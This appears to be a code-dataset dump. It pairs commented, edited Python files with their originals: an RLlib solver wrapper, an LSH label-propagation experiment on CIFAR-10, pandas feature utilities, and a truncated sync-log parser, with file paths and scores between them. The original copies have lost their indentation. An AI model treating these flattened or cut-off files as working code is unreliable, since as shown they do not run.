        """Resets the env and returns observations from ready agents.

        # Returns
        obs (dict): New observations for each ready agent.
        """
        raw_observation = self._domain.reset()
        # Unwrap each agent's observation into the raw Gym value RLlib expects.
        observation = {
            k: next(iter(self._domain.get_observation_space()[k].to_unwrapped([v])))
            for k, v in raw_observation.items()
        }
        return observation

    def step(self, action_dict):
        """Returns observations from ready agents.

        The returns are dicts mapping from agent_id strings to values. The
        number of agents in the env can vary over time.

        # Returns
        obs (dict): New observations for each ready agent.
        rewards (dict): Reward values for each ready agent. If the episode is just started, the value will be None.
        dones (dict): Done values for each ready agent. The special key "__all__" (required) is used to indicate env
            termination.
        infos (dict): Optional info values for each agent id.
        """
        # Wrap RLlib's raw Gym actions back into scikit-decide space elements.
        action = {
            k: next(iter(self._domain.get_action_space()[k].from_unwrapped([v])))
            for k, v in action_dict.items()
        }
        outcome = self._domain.step(action)
        observations = {
            k: next(iter(self._domain.get_observation_space()[k].to_unwrapped([v])))
            for k, v in outcome.observation.items()
        }
        rewards = {k: v.reward for k, v in outcome.value.items()}
        # RLlib requires the special "__all__" key to signal episode termination.
        done = {"__all__": outcome.termination}
        infos = {k: (v or {}) for k, v in outcome.info.items()}
        return observations, rewards, done, infos

    def unwrapped(self):
        """Unwrap the scikit-decide domain and return it.

        # Returns
        The original scikit-decide domain.
        """
        return self._domain
if __name__ == "__main__":
    from ray.rllib.agents.ppo import PPOTrainer

    from skdecide.hub.domain.rock_paper_scissors import RockPaperScissors
    from skdecide.utils import rollout

    # Smoke test: train PPO for one iteration on Rock-Paper-Scissors,
    # then roll the learned policy out.
    domain_factory = lambda: RockPaperScissors()
    domain = domain_factory()
    if RayRLlib.check_domain(domain):
        solver_factory = lambda: RayRLlib(
            PPOTrainer, train_iterations=1, config={"framework": "torch"}
        )
        solver = RockPaperScissors.solve_with(solver_factory, domain_factory)
        rollout(
            domain,
            solver,
            action_formatter=lambda a: str({k: v.name for k, v in a.items()}),
            outcome_formatter=lambda o: f"{ {k: v.name for k, v in o.observation.items()} }"
            f" - rewards: { {k: v.reward for k, v in o.value.items()} }",
        )
        # Fixed: the closing parenthesis line was corrupted by extraction artifacts.
from __future__ import annotations
import glob
import os
from typing import Callable, Dict, Optional, Type
import ray
from ray.rllib.agents.trainer import Trainer
from ray.rllib.env.multi_agent_env import MultiAgentEnv
from ray.tune.registry import register_env
from skdecide import Domain, Solver
from skdecide.builders.domain import (
Initializable,
Sequential,
SingleAgent,
UnrestrictedActions,
)
from skdecide.builders.solver import Policies, Restorable
from skdecide.hub.space.gym import GymSpace
# TODO: remove UnrestrictedActions?
class D(Domain, Sequential, UnrestrictedActions, Initializable):
pass
class RayRLlib(Solver, Policies, Restorable):
"""This class wraps a Ray RLlib solver (ray[rllib]) as a scikit-decide solver.
!!! warning
Using this class requires Ray RLlib to be installed.
"""
T_domain = D
def __init__(
self,
algo_class: Type[Trainer],
train_iterations: int,
config: Optional[Dict] = None,
policy_configs: Dict[str, Dict] = {"policy": {}},
policy_mapping_fn: Callable[[str], str] = lambda agent_id: "policy",
) -> None:
"""Initialize Ray RLlib.
# Parameters
algo_class: The class of Ray RLlib trainer/agent to wrap.
train_iterations: The number of iterations to call the trainer's train() method.
config: The configuration dictionary for the trainer.
policy_configs: The mapping from policy id (str) to additional config (dict) (leave default for single policy).
policy_mapping_fn: The function mapping agent ids to policy ids (leave default for single policy).
"""
self._algo_class = algo_class
self._train_iterations = train_iterations
self._config = config or {}
self._policy_configs = policy_configs
self._policy_mapping_fn = policy_mapping_fn
ray.init(ignore_reinit_error=True)
@classmethod
def _check_domain_additional(cls, domain: Domain) -> bool:
if isinstance(domain, SingleAgent):
return isinstance(domain.get_action_space(), GymSpace) and isinstance(
domain.get_observation_space(), GymSpace
)
else:
return all(
isinstance(a, GymSpace) for a in domain.get_action_space().values()
) and all(
isinstance(o, GymSpace) for o in domain.get_observation_space().values()
)
def _solve_domain(self, domain_factory: Callable[[], D]) -> None:
# Reuse algo if possible (enables further learning)
if not hasattr(self, "_algo"):
self._init_algo(domain_factory)
# Training loop
for _ in range(self._train_iterations):
self._algo.train()
def _sample_action(
self, observation: D.T_agent[D.T_observation]
) -> D.T_agent[D.T_concurrency[D.T_event]]:
action = {
k: self._algo.compute_action(
self._unwrap_obs(v, k), policy_id=self._policy_mapping_fn(k)
)
for k, v in observation.items()
}
return self._wrap_action(action)
def _is_policy_defined_for(self, observation: D.T_agent[D.T_observation]) -> bool:
return True
def _save(self, path: str) -> None:
self._algo.save(path)
def _load(self, path: str, domain_factory: Callable[[], D]):
if not os.path.isfile(path):
# Find latest checkpoint
metadata_files = glob.glob(f"{path}/**/*.tune_metadata")
latest_metadata_file = max(metadata_files, key=os.path.getctime)
path = latest_metadata_file[: -len(".tune_metadata")]
self._init_algo(domain_factory)
self._algo.restore(path)
def _init_algo(self, domain_factory: Callable[[], D]):
domain = domain_factory()
self._wrap_action = lambda a: {
k: next(iter(domain.get_action_space()[k].from_unwrapped([v])))
for k, v in a.items()
}
self._unwrap_obs = lambda o, agent: next(
iter(domain.get_observation_space()[agent].to_unwrapped([o]))
)
# Overwrite multi-agent config
pol_obs_spaces = {
self._policy_mapping_fn(k): v.unwrapped()
for k, v in domain.get_observation_space().items()
}
pol_act_spaces = {
self._policy_mapping_fn(k): v.unwrapped()
for k, v in domain.get_action_space().items()
}
policies = {
k: (None, pol_obs_spaces[k], pol_act_spaces[k], v or {})
for k, v in self._policy_configs.items()
}
self._config["multiagent"] = {
"policies": policies,
"policy_mapping_fn": self._policy_mapping_fn,
}
# Instanciate algo
register_env("skdecide_env", lambda _: AsRLlibMultiAgentEnv(domain_factory()))
self._algo = self._algo_class(env="skdecide_env", config=self._config)
class AsRLlibMultiAgentEnv(MultiAgentEnv):
def __init__(self, domain: D) -> None:
"""Initialize AsRLlibMultiAgentEnv.
# Parameters
domain: The scikit-decide domain to wrap as a RLlib multi-agent environment.
"""
self._domain = domain
def reset(self):
"""Resets the env and returns observations from ready agents.
# Returns
obs (dict): New observations for each ready agent.
"""
raw_observation = self._domain.reset()
observation = {
k: next(iter(self._domain.get_observation_space()[k].to_unwrapped([v])))
for k, v in raw_observation.items()
}
return observation
def step(self, action_dict):
"""Returns observations from ready agents.
The returns are dicts mapping from agent_id strings to values. The
number of agents in the env can vary over time.
# Returns
obs (dict): New observations for each ready agent.
rewards (dict): Reward values for each ready agent. If the episode is just started, the value will be None.
dones (dict): Done values for each ready agent. The special key "__all__" (required) is used to indicate env
termination.
infos (dict): Optional info values for each agent id.
"""
action = {
k: next(iter(self._domain.get_action_space()[k].from_unwrapped([v])))
for k, v in action_dict.items()
}
outcome = self._domain.step(action)
observations = {
k: next(iter(self._domain.get_observation_space()[k].to_unwrapped([v])))
for k, v in outcome.observation.items()
}
rewards = {k: v.reward for k, v in outcome.value.items()}
done = {"__all__": outcome.termination}
infos = {k: (v or {}) for k, v in outcome.info.items()}
return observations, rewards, done, infos
def unwrapped(self):
"""Unwrap the scikit-decide domain and return it.
# Returns
The original scikit-decide domain.
"""
return self._domain
if __name__ == "__main__":
from ray.rllib.agents.ppo import PPOTrainer
from skdecide.hub.domain.rock_paper_scissors import RockPaperScissors
from skdecide.utils import rollout
domain_factory = lambda: RockPaperScissors()
domain = domain_factory()
if RayRLlib.check_domain(domain):
solver_factory = lambda: RayRLlib(
PPOTrainer, train_iterations=1, config={"framework": "torch"}
)
solver = RockPaperScissors.solve_with(solver_factory, domain_factory)
rollout(
domain,
solver,
action_formatter=lambda a: str({k: v.name for k, v in a.items()}),
outcome_formatter=lambda o: f"{ {k: v.name for k, v in o.observation.items()} }"
f" - rewards: { {k: v.reward for k, v in o.value.items()} }",
) | 0.836955 | 0.240869 |
import numpy as np
import _pickle as cPickle
import matplotlib.pyplot as plt
from scipy.spatial.distance import cdist
from sklearn.preprocessing import OneHotEncoder
from sklearn.neighbors import NearestNeighbors
import scipy.sparse
import scipy.sparse.linalg
from sklearn.decomposition import PCA
import math
import nearpy
plt.style.use('ggplot')
def unpickle(file):
    """Load one pickled object from *file* (CIFAR batches are latin1-encoded).

    Uses a context manager so the handle is closed even if loading raises
    (the original leaked the file handle on a cPickle error).
    """
    with open(file, 'rb') as fo:
        return cPickle.load(fo, encoding='latin1')
def mask(n, p):
    """Return an (n, 1) int32 array of Bernoulli(p) indicator draws.

    n -- number of samples
    p -- probability of masking a label (entry set to 1)
    """
    draws = np.random.rand(n, 1) < p
    return draws.astype(np.int32)
def build_knn_graph(similarities, k):
    """Build a symmetric k-NN weight matrix from a dense similarity matrix.

    WARNING: mutates *similarities* in place (selected entries are zeroed).
    NOTE(review): if row i's best neighbor j also picks i in the same pass,
    the second assignment reads the already-zeroed entry and resets the
    weight to 0 -- confirm this mutual-pair behavior is intended.
    """
    weights = np.zeros(similarities.shape)
    for l in range(k):
        # Each row's current best remaining neighbor (computed once per pass).
        idx = np.argmax(similarities, axis = 1)
        for i,j in enumerate(idx):
            # Record the edge symmetrically, then remove it from contention.
            weights[i,j] = weights[j,i] = similarities[i,j]
            similarities[i,j] = similarities[j,i] = 0
    return weights
def gaussian_similarity(distance, sigma):
    """RBF kernel: exp(-d^2 / (2 * sigma^2))."""
    scaled = (distance * distance) / (2.0 * sigma ** 2)
    return np.exp(-scaled)
def get_similarities(weights):
    """Convert a sparse distance matrix into Gaussian similarities (COO format).

    NOTE(review): `sigma` is read from module/global scope here -- it is NOT
    the HFS() parameter. A global `sigma` must be defined before calling or
    this raises NameError; consider passing it through as an argument.
    """
    row, col, distances = scipy.sparse.find(weights)
    similarities = gaussian_similarity(distances, sigma)
    return scipy.sparse.coo_matrix((similarities, (row, col)), shape=weights.shape)
def get_laplacian(weights):
    """Unnormalized graph Laplacian L = D - W for a sparse weight matrix."""
    degrees = np.squeeze(np.array(weights.sum(axis=1)))
    return scipy.sparse.diags(degrees, 0) - weights
def get_approximate_neighbors(query, data, engines_list, k):
    """Approximate k nearest neighbors of *query* via LSH candidate pooling.

    query -- 1-D query vector
    data -- (n, d) matrix the engines were built from
    engines_list -- list of nearpy engines (independent hash tables)
    k -- number of neighbors to return
    Returns (neighbor_row_indices_into_data, distances).
    """
    # Pool candidate row indexes from every hash table.
    candidate_indexes = set()
    for engine in engines_list:
        bucket = engine.neighbours(query)
        candidate_indexes = candidate_indexes.union({el[1] for el in bucket})
    candidate_indexes = list(candidate_indexes)
    candidates = data[candidate_indexes, :]
    # Exact k-NN restricted to the pooled candidates.
    distances, neighbors = NearestNeighbors(
        n_neighbors=k, algorithm='ball_tree').fit(candidates).kneighbors(
        query.reshape([1, -1]))
    # Fix: kneighbors() returns positions within *candidates*; map them back
    # to global row indices of *data* (the original returned subset positions,
    # which callers then misused as global indices).
    neighbors = np.asarray(candidate_indexes)[neighbors]
    return neighbors.squeeze(), distances.squeeze()
def build_approx_graph(data, k, L, projection_count=20):
    """Build a sparse symmetric k-NN distance graph using L nearpy LSH engines.

    Assumes get_approximate_neighbors returns row indices into `data`
    (TODO confirm).  Returns an (n, n) DOK matrix of pairwise distances.
    """
    n, d = data.shape
    engine =[]
    # One independent random-projection-tree engine per hash table.
    for l in range(L):
        engine.append(nearpy.Engine(d, lshashes=[ nearpy.hashes.RandomBinaryProjectionTree('rbp',projection_count, k+1) ],
                                    distance=nearpy.distances.EuclideanDistance()))
    # Index every data point in every engine.
    for i in range(n):
        for l in range(L):
            engine[l].store_vector(data[i,:], i)
    weights = scipy.sparse.dok_matrix((n,n), dtype=np.float32)
    for i in range(n):
        # Ask for k+1 neighbors because the query itself comes back first.
        neighbors, distances = get_approximate_neighbors(data[i,:], data, engine, k+1)
        neighbors = neighbors[1:] # get rid of the first neighbor that is a query itself
        distances = distances[1:]
        for j in range(k):
            weights[i,neighbors[j]] = distances[j]
            weights[neighbors[j],i] = distances[j]
    return weights
def build_graph(data, k):
    """Build an exact sparse symmetric k-NN distance graph over rows of `data`.

    Returns an (n, n) DOK matrix where entry (i, j) holds the Euclidean
    distance between mutual/one-sided k-NN pairs (stored symmetrically).
    """
    n, d = data.shape
    #knn = NearestNeighbors(n_neighbors=k+1, algorithm='ball_tree').fit(data)
    # k+1 because each point is returned as its own nearest neighbor.
    all_distances, all_neighbors = NearestNeighbors(n_neighbors=k+1, algorithm='ball_tree').fit(data).kneighbors(data)
    weights = scipy.sparse.dok_matrix((n,n), dtype=np.float32)
    for i in range(n):
        neighbors = all_neighbors[i,1:] # get rid of the first neighbor that is a query itself
        distances = all_distances[i,1:]
        for j in range(k):
            weights[i,neighbors[j]] = distances[j]
            weights[neighbors[j],i] = distances[j]
    return weights
def solve_HFS(laplacian, c_u, c_l, gamma_g, y):
    """Solve the regularized Harmonic Function Solution linear system.

    Rows whose first label column is 0 are treated as unlabeled (cost c_u),
    the rest as labeled (cost c_l); gamma_g adds a ridge term to the
    Laplacian.  Solves (C^-1 (L + gamma_g I) + I) f = y and returns f.
    """
    # FIX: the size was taken from a module-level global `n` (only defined in
    # the __main__ block); derive it from the Laplacian itself.
    n_nodes = laplacian.shape[0]
    C_inv_array = np.array(1./c_u*(y[:,0]==0) + 1./c_l*(y[:,0]!=0), dtype=np.float32)
    C_inv = scipy.sparse.diags(C_inv_array, 0)
    Q = laplacian + gamma_g*scipy.sparse.eye(n_nodes)
    return scipy.sparse.linalg.spsolve(C_inv.dot(Q) + scipy.sparse.eye(n_nodes), y)
def HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=False, L=5, projection_count=20, laplacian = None):
    """Run Harmonic Function Solution label propagation on a k-NN graph.

    Builds an exact (approx=False) or LSH-approximate (approx=True) k-NN
    graph, converts distances to similarities, and solves the HFS system.
    Returns (solution, laplacian).

    NOTE(review): the `sigma` and `laplacian` parameters are never used
    (get_similarities reads a global sigma, and `laplacian` is always
    recomputed) -- confirm before relying on them.
    """
    if not approx:
        weights = build_graph(data, k)
    else:
        weights = build_approx_graph(data, k, L, projection_count)
    weights = get_similarities(weights)
    laplacian = get_laplacian(weights)
    return solve_HFS(laplacian, c_u,c_l, gamma_g,y), laplacian
if __name__ == '__main__':
    # ---- Load the five CIFAR-10 training batches ----
    data = []
    labels = []
    for i in range(5):
        batch = unpickle('./cifar-10-batches-py/data_batch_%d' % (i+1))
        data.append(batch['data'])
        labels.append(np.array(batch['labels']))
    data = np.concatenate(data, axis=0)
    labels = np.concatenate(labels, axis=0)
    # One-hot encode the classes, then map {0,1} -> {-1,+1} as HFS expects.
    labels = OneHotEncoder(sparse=False).fit_transform(labels.reshape([-1,1]))
    labels = 2*labels-1
    n = 5000 # number of samples
    p = 0.1 # probability of unmasking a label
    idxs = np.random.permutation(np.arange(data.shape[0]))[:n]
    data = data[idxs,:]
    labels = labels[idxs]
    _mask = mask(n, p)
    y = labels*_mask # masked labels
    n_l = np.sum(_mask)
    # Reduce dimensionality before graph construction.
    dimension = 100
    pca = PCA(n_components=100)
    data = pca.fit_transform(data)
    k = 10
    sigma = 1000.
    gamma_g = math.sqrt(n_l**3)
    c_u = 1
    c_l = 1
    L = 5
    # Exact solution used as the reference for the approximation study.
    l, laplacian = HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=False)
    l_error = []
    laplacian_error = []
    for L in range(2,50,2):
        print('L = %d' % L)
        l_approx, laplacian_approx = HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=True, L = L)
        l_error.append(np.sum((l_approx - l)**2))
        laplacian_error.append(scipy.sparse.linalg.norm(laplacian-laplacian_approx, ord='fro'))
    np.savetxt('l_error_L.txt', np.array(l_error, dtype=np.float32))
    # BUG FIX: this previously saved l_error a second time instead of
    # laplacian_error.
    np.savetxt('laplacian_error_L.txt', np.array(laplacian_error, dtype=np.float32))
    plt.figure()
    plt.plot(l_error)
    plt.show()
    plt.figure()
    plt.plot(laplacian_error)
    plt.show()
    laplacian = get_laplacian(get_similarities(build_graph(data, k)))
    # BUG FIX: was get_similarities(get_similarities(...)), which produced a
    # similarity matrix -- not a Laplacian -- for the approximate graph.
    laplacian_approx = get_laplacian(get_similarities(build_approx_graph(data, k, L=15)))
    error = []
    for gamma_g in range(1,1000, 10):
        print('gamma_g = %f' % gamma_g)
        l = solve_HFS(laplacian, c_u, c_l, gamma_g, y)
        l_approx = solve_HFS(laplacian_approx, c_u, c_l, gamma_g, y)
        error.append(np.sum((l_approx - l)**2))
    np.savetxt('l_error_gamma_g.txt', np.array(error, dtype=np.float32))
    plt.figure()
    plt.plot(np.array(error))
    plt.plot(2576*np.power(1./np.arange(1,1000,1), 4))
plt.show() | lsh_hfs.py | import numpy as np
import _pickle as cPickle
import matplotlib.pyplot as plt
from scipy.spatial.distance import cdist
from sklearn.preprocessing import OneHotEncoder
from sklearn.neighbors import NearestNeighbors
import scipy.sparse
import scipy.sparse.linalg
from sklearn.decomposition import PCA
import math
import nearpy
plt.style.use('ggplot')
def unpickle(file):
fo = open(file, 'rb')
data = cPickle.load(fo, encoding='latin1')
fo.close()
return data
def mask(n, p):
# n - number of samples
# p - probability of masking a label
# randomly choose which labels to mask
return np.array(np.random.rand(n,1) < p, dtype=np.int32)
def build_knn_graph(similarities, k):
weights = np.zeros(similarities.shape)
for l in range(k):
idx = np.argmax(similarities, axis = 1)
for i,j in enumerate(idx):
weights[i,j] = weights[j,i] = similarities[i,j]
similarities[i,j] = similarities[j,i] = 0
return weights
def gaussian_similarity(distance, sigma):
return np.exp(-distance*distance / (2*sigma**2))
def get_similarities(weights):
row, col, distances = scipy.sparse.find(weights)
similarities = gaussian_similarity(distances, sigma)
return scipy.sparse.coo_matrix((similarities, (row, col)), shape=weights.shape)
def get_laplacian(weights):
return scipy.sparse.diags(np.squeeze(np.array(weights.sum(axis=1))), 0) - weights
def get_approximate_neighbors(query, data, engines_list, k):
# k - number of neighbors
L = len(engines_list)
neighbors = []
distances = []
idxs = np.zeros(L, dtype=np.int32)
candidate_indexes = set()
for l in range(L):
bucket = engines_list[l].neighbours(query)
candidate_indexes = candidate_indexes.union({el[1] for el in bucket})
candidate_indexes = list(candidate_indexes)
candidates = data[candidate_indexes,:]
distances, neighbors = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(candidates).kneighbors(query.reshape([1,-1]))
return neighbors.squeeze(), distances.squeeze()
def build_approx_graph(data, k, L, projection_count=20):
n, d = data.shape
engine =[]
for l in range(L):
engine.append(nearpy.Engine(d, lshashes=[ nearpy.hashes.RandomBinaryProjectionTree('rbp',projection_count, k+1) ],
distance=nearpy.distances.EuclideanDistance()))
for i in range(n):
for l in range(L):
engine[l].store_vector(data[i,:], i)
weights = scipy.sparse.dok_matrix((n,n), dtype=np.float32)
for i in range(n):
neighbors, distances = get_approximate_neighbors(data[i,:], data, engine, k+1)
neighbors = neighbors[1:] # get rid of the first neighbor that is a query itself
distances = distances[1:]
for j in range(k):
weights[i,neighbors[j]] = distances[j]
weights[neighbors[j],i] = distances[j]
return weights
def build_graph(data, k):
n, d = data.shape
#knn = NearestNeighbors(n_neighbors=k+1, algorithm='ball_tree').fit(data)
all_distances, all_neighbors = NearestNeighbors(n_neighbors=k+1, algorithm='ball_tree').fit(data).kneighbors(data)
weights = scipy.sparse.dok_matrix((n,n), dtype=np.float32)
for i in range(n):
neighbors = all_neighbors[i,1:] # get rid of the first neighbor that is a query itself
distances = all_distances[i,1:]
for j in range(k):
weights[i,neighbors[j]] = distances[j]
weights[neighbors[j],i] = distances[j]
return weights
def solve_HFS(laplacian, c_u, c_l, gamma_g, y):
C_inv_array = np.array(1./c_u*(y[:,0]==0) + 1./c_l*(y[:,0]!=0), dtype=np.float32)
C_inv = scipy.sparse.diags(C_inv_array, 0)
Q = laplacian + gamma_g*scipy.sparse.eye(n)
return scipy.sparse.linalg.spsolve(C_inv.dot(Q) + scipy.sparse.eye(n), y)
def HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=False, L=5, projection_count=20, laplacian = None):
if not approx:
weights = build_graph(data, k)
else:
weights = build_approx_graph(data, k, L, projection_count)
weights = get_similarities(weights)
laplacian = get_laplacian(weights)
return solve_HFS(laplacian, c_u,c_l, gamma_g,y), laplacian
if __name__ == '__main__':
# Reading data
data = []
labels = []
for i in range(5):
batch = unpickle('./cifar-10-batches-py/data_batch_%d' % (i+1))
data.append(batch['data'])
labels.append(np.array(batch['labels']))
data = np.concatenate(data, axis=0)
labels = np.concatenate(labels, axis=0)
labels = OneHotEncoder(sparse=False).fit_transform(labels.reshape([-1,1]))
labels = 2*labels-1
n = 5000 # number of samples
p = 0.1 # probability of unmasking a label
idxs = np.random.permutation(np.arange(data.shape[0]))[:n]
data = data[idxs,:]
labels = labels[idxs]
_mask = mask(n, p)
y = labels*_mask # masked labels
n_l = np.sum(_mask)
dimension = 100
pca = PCA(n_components=100)
data = pca.fit_transform(data)
k = 10
sigma = 1000.
gamma_g = math.sqrt(n_l**3)
c_u = 1
c_l = 1
L = 5
l, laplacian = HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=False)
l_error = []
laplacian_error = []
for L in range(2,50,2):
print('L = %d' % L)
l_approx, laplacian_approx = HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=True, L = L)
l_error.append(np.sum((l_approx - l)**2))
laplacian_error.append(scipy.sparse.linalg.norm(laplacian-laplacian_approx, ord='fro'))
np.savetxt('l_error_L.txt', np.array(l_error, dtype=np.float32))
np.savetxt('laplacian_error_L.txt', np.array(l_error, dtype=np.float32))
plt.figure()
plt.plot(l_error)
plt.show()
plt.figure()
plt.plot(laplacian_error)
plt.show()
laplacian = get_laplacian(get_similarities(build_graph(data, k)))
laplacian_approx = get_similarities(get_similarities(build_approx_graph(data, k, L=15)))
error = []
for gamma_g in range(1,1000, 10):
print('gamma_g = %f' % gamma_g)
l = solve_HFS(laplacian, c_u, c_l, gamma_g, y)
l_approx = solve_HFS(laplacian_approx, c_u, c_l, gamma_g, y)
error.append(np.sum((l_approx - l)**2))
np.savetxt('l_error_gamma_g.txt', np.array(error, dtype=np.float32))
plt.figure()
plt.plot(np.array(error))
plt.plot(2576*np.power(1./np.arange(1,1000,1), 4))
plt.show() | 0.598312 | 0.476823 |
import os
import pandas as pd
import numpy as np
from hydra import utils
import itertools
from sklearn import preprocessing
class FeatureFactory:
    """Runs the feature-engineering steps listed in a Hydra config."""
    def __init__(self, configs: dict, cv=None):
        # `configs` behaves like a Hydra/OmegaConf node: it supports both
        # item access ('exp_name') and attribute access (.data, .fe).
        self.run_name = configs['exp_name']
        self.data = configs.data
        self.coldef = self.data.cols_definition
        self.fe = configs.fe
        self.cv = cv  # optional cross-validation splitter (unused here)
    def create(self):
        """Instantiate (and thereby execute) each configured feature step."""
        print('Load data')
        for f in self.fe:
            print(f)
            utils.instantiate(f)
def load_data(train_csv, test_csv):
    """Concatenate train and test CSVs into features/train_test.ftr.

    Skipped when the feather file already exists; always prints its head
    as a sanity check.
    """
    print('Load Data')
    feature_name = "features/train_test.ftr"
    feature_abs_path = utils.to_absolute_path(feature_name)
    if not os.path.exists(feature_abs_path):
        train_df = pd.read_csv(utils.to_absolute_path(train_csv))
        test_df = pd.read_csv(utils.to_absolute_path(test_csv))
        # Test rows follow train rows; callers split them back by length.
        pd.concat([
            train_df, test_df,
        ], sort=False).reset_index(drop=True).to_feather(feature_abs_path)
    print(pd.read_feather(feature_abs_path).head())
def numeric_interact_2order(target_col, input_feature):
    """Create pairwise (2nd-order) arithmetic interaction features.

    For every pair of columns in `target_col`, adds the sum, product,
    difference and ratio as new columns, then stores only the new columns
    to features/numeric_interact_2order.ftr (skipped if it already exists).
    """
    print('Numeric Interact 2nd Order')
    df = pd.read_feather(utils.to_absolute_path(input_feature))
    org_cols = df.columns.values
    feature_name = "features/numeric_interact_2order.ftr"
    feature_abs_path = utils.to_absolute_path(feature_name)
    if not os.path.exists(feature_abs_path):
        for col1, col2 in itertools.combinations(target_col, 2):
            df[f'{col1}_plus_{col2}'] = df[col1] + df[col2]
            df[f'{col1}_mul_{col2}'] = df[col1] * df[col2]
            df[f'{col1}_sub_{col2}'] = df[col1] - df[col2]
            try:
                df[f'{col1}_div_{col2}'] = df[col1] / df[col2]
            # FIX: was a bare `except:`; keep the best-effort behavior but
            # don't swallow KeyboardInterrupt/SystemExit.
            except Exception:
                print(f'{col1}_div_{col2}')
        # Persist only the newly generated columns.
        df.drop(org_cols, axis=1).reset_index(drop=True).to_feather(feature_abs_path)
    print(pd.read_feather(feature_abs_path).head())
def label_encoding(target_col, input_feature):
    """Label-encode the given categorical columns.

    Writes only the new `<col>_lbl_encoded` columns to
    features/label_encoding.ftr; skipped when that file already exists.
    """
    print('Label Encoding')
    df = pd.read_feather(utils.to_absolute_path(input_feature))
    org_cols = df.columns.values
    feature_name = "features/label_encoding.ftr"
    feature_abs_path = utils.to_absolute_path(feature_name)
    if not os.path.exists(feature_abs_path):
        for f in target_col:
            try:
                lbl = preprocessing.LabelEncoder()
                df[f'{f}_lbl_encoded'] = lbl.fit_transform(list(df[f].values))
            # FIX: was a bare `except:`; report the failing column and move
            # on without swallowing KeyboardInterrupt/SystemExit.
            except Exception:
                print(f)
        df.drop(org_cols, axis=1).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head()) | src/speeder/feature/feature_utils.py | import os
import pandas as pd
import numpy as np
from hydra import utils
import itertools
from sklearn import preprocessing
class FeatureFactory:
def __init__(self, configs: dict, cv=None):
self.run_name = configs['exp_name']
self.data = configs.data
self.coldef = self.data.cols_definition
self.fe = configs.fe
self.cv = cv
def create(self):
print('Load data')
for f in self.fe:
print(f)
utils.instantiate(f)
def load_data(train_csv, test_csv):
print('Load Data')
feature_name = "features/train_test.ftr"
feature_abs_path = utils.to_absolute_path(feature_name)
if not os.path.exists(feature_abs_path):
train_df = pd.read_csv(utils.to_absolute_path(train_csv))
test_df = pd.read_csv(utils.to_absolute_path(test_csv))
pd.concat([
train_df, test_df,
], sort=False).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head())
def numeric_interact_2order(target_col, input_feature):
print('Numeric Interact 2nd Order')
df = pd.read_feather(utils.to_absolute_path(input_feature))
org_cols = df.columns.values
feature_name = "features/numeric_interact_2order.ftr"
feature_abs_path = utils.to_absolute_path(feature_name)
if not os.path.exists(feature_abs_path):
for col1, col2 in list(itertools.combinations(target_col, 2)):
df[f'{col1}_plus_{col2}'] = df[col1] + df[col2]
df[f'{col1}_mul_{col2}'] = df[col1] * df[col2]
df[f'{col1}_sub_{col2}'] = df[col1] - df[col2]
try:
df[f'{col1}_div_{col2}'] = df[col1] / df[col2]
except:
print(f'{col1}_div_{col2}')
df.drop(org_cols, axis=1).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head())
def label_encoding(target_col, input_feature):
print('Label Encoding')
df = pd.read_feather(utils.to_absolute_path(input_feature))
org_cols = df.columns.values
feature_name = "features/label_encoding.ftr"
feature_abs_path = utils.to_absolute_path(feature_name)
if not os.path.exists(feature_abs_path):
for f in target_col:
try:
lbl = preprocessing.LabelEncoder()
df[f'{f}_lbl_encoded'] = lbl.fit_transform(list(df[f].values))
except:
print(f)
df.drop(org_cols, axis=1).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head()) | 0.253584 | 0.295654 |
from __future__ import print_function
import cbor
import argparse
import datetime
import time
import pprint
import collections
import logging
logr = logging.getLogger( __name__ )
# Template for per-directory sync statistics, copied for each new SYNCDIR
# 'start' record.  'elapsed' defaults to a large sentinel (999999) so that
# directories that never receive an 'end' record stand out in the report.
default_dirdata = { 'start': 0,
                    'num_src_dirs': 0,
                    'num_src_files': 0,
                    'num_tgt_dirs': 0,
                    'num_tgt_files': 0,
                    'srctot': 0,
                    'end': 0,
                    'elapsed': 999999,
                  }
def process_cmdline():
    """Parse command-line arguments: the input log file and --inodes."""
    parser = argparse.ArgumentParser()
    parser.add_argument( 'infile' )
    parser.add_argument( '--inodes', '-i', type=int, metavar='N',
        default=220531082,
        help='Source file system has N inodes total. '
             'Used to estimate completion progress.' )
    return parser.parse_args()
def process_start_end_times( rec, time_data ):
    """Track the min (start_ts) and max (end_ts) timestamp seen so far.

    BUG FIX: the original used `elif`, so a record that lowered start_ts
    could never also raise end_ts -- e.g. with a single-record log the
    initial end_ts of 0 was never updated, yielding a negative elapsed
    time.  Min and max are now tracked independently.
    """
    newts = rec[ 'ts' ]
    if newts < time_data[ 'start_ts' ]:
        time_data[ 'start_ts' ] = newts
    if newts > time_data[ 'end_ts' ]:
        time_data[ 'end_ts' ] = newts
def count_sync_types( rec, sync_types ):
    """Tally one record into sync_types[synctype][msgtype] counters."""
    if 'synctype' not in rec:
        logr.warning( "No synctype in record: {0}".format( rec ) )
        return
    stype = rec[ 'synctype' ]
    # Records without a msgtype are tallied under the literal key 'None'.
    mtype = rec.get( 'msgtype', 'None' )
    sdata = sync_types.setdefault( stype, {} )
    sdata[ mtype ] = sdata.get( mtype, 0 ) + 1
def process_syncdir_stats( rec, syncdir_data ):
    """Fold one SYNCDIR record into the per-directory statistics.

    State machine keyed by src path: 'start' opens a working entry,
    'info' fills in counts, 'end' computes elapsed time and closes it.
    A second 'start' for the same src moves it to the dups list, and all
    later records for a dup'd src are ignored.
    """
    if rec[ 'synctype' ] != 'SYNCDIR':
        return
    dir_data = syncdir_data[ 'dir_data' ]
    dups = syncdir_data[ 'dups' ]
    working = syncdir_data[ 'working' ]
    ts = rec[ 'ts' ]
    msgtype = rec[ 'msgtype' ]
    src = rec[ 'src' ]
    if src in dups:
        return
    if msgtype == 'start':
        # A src seen before (finished or in-flight) is a duplicate.
        if src in dir_data or src in working:
            dups[ src ] = pprint.pformat( rec )
            return
        working[ src ] = default_dirdata.copy()
        working[ src ][ 'start' ] = ts
        # dir_data and working share the same dict object, so later
